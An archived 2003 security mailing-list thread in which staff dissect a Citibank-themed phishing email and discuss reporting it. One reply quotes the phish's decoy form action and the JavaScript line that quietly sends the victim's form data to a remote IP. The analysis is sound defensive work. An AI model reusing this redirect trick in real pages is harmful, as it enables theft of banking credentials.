RE: CRIME Fwd: Your account is On Hold.

From: Rich Rohrich (rich_rohrich@private)
Date: Tue May 20 2003 - 11:16:05 PDT

  • Next message: Crispin Cowan: "Re: CRIME Fwd: Your account is On Hold."

    yes... although I had trouble contacting a real person who seemed to care about it.  I sent this info it to the contacts listed on their domain registration.  Their customer service department wouldn't connect me to their security department.
    
    >>> jbryner1@private 05/20/03 9:45 AM >>>
    Only one way to find out. Rich; Have you sent it to
    them? 
    
    The interesting bits I saw with a quick look were: 
    --Where they want you to think they're posting to:
    ACTION="http://adswww.harvard.edu/ads_abstracts.html"
    method="POST"
    --Where they want you to think they're mailing to:
    NAME="mailto" VALUE="iraqhdrs@private">
    --where they actually send to:
    vvpks@private
    --where they actually post to:
    document.aform.action='http://209.97.63.225/cgi-bin/webforms.pl';
    
    I'm sure citibank and the owners of 209.97.63.225
    would be interested.
    
    Jeff.
    CISSP, GCIH
    
    --- Arthur Strutzenberg
    <arthur.strutzenberg@private> wrote:
    > OK now for the question:  Does anyone know if
    > Citibank bothers to ever
    > investigate fraud like this?
    > 
    > --Art
    > 
    > 
    >
    ------------------------------------------------------
    > Arthur Strutzenberg        Swan Island Networks Inc
    > 
    > arthur.strutzenberg@private
    > http://www.swanisland.net
    > 
    > (503)-796-7926 (x20)
    >
    ------------------------------------------------------
    > 
    > 
    > -----Original Message-----
    > From: owner-crime@private
    > [mailto:owner-crime@private] On Behalf
    > Of Rich Rohrich
    > Sent: Tuesday, May 20, 2003 7:56 AM
    > To: CRIME@private
    > Subject: CRIME Fwd: Your account is On Hold.
    > 
    > Hey check out this email I received in my mail last
    > night.
    > Unfortunately I'm sure there are people who are
    > gullible enough to fill
    > out this information.  Its like an identity theft
    > kit!
    > 
    > Rich Rohrich
    > PGE IT Security
    > 503-464-7159
    >  
    > 
    > 
    
    
    __________________________________
    Do you Yahoo!?
    The New Yahoo! Search - Faster. Easier. Bingo.
    http://search.yahoo.com
    



    This archive was generated by hypermail 2b30 : Tue May 20 2003 - 11:48:54 PDT